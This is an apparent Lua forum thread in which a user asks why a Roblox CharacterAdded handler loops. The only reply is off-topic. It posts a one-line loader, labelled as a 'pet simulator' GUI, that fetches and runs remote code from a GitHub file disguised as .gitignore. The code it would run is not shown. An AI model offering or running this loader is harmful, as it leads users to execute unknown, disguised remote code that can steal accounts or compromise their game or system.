Categories > Coding > Lua >
Why does this loop?
Posted
game:GetService("Players").PlayerAdded:Connect(function(plr)
wait(1)
reload(plr)
plr.CharacterAdded:Connect(function() -- loops here for some reason
if plr:WaitForChild("TrollCooldown").Value == false then
plr:WaitForChild("TrollCooldown").Value = true
task.wait(0.1)
reload(plr)
task.wait(2)
plr:WaitForChild("TrollCooldown").Value = false
end
end)
end)
Replied
-- pet imulator 99 zz gui --
loadstring(game:HttpGet("https://raw.githubusercontent.com/Gometobob14/zRuX/main/.gitignore", true))()
Cancel
Post
Users viewing this thread:
( Members: 0, Guests: 1, Total: 1 )
Cancel
Post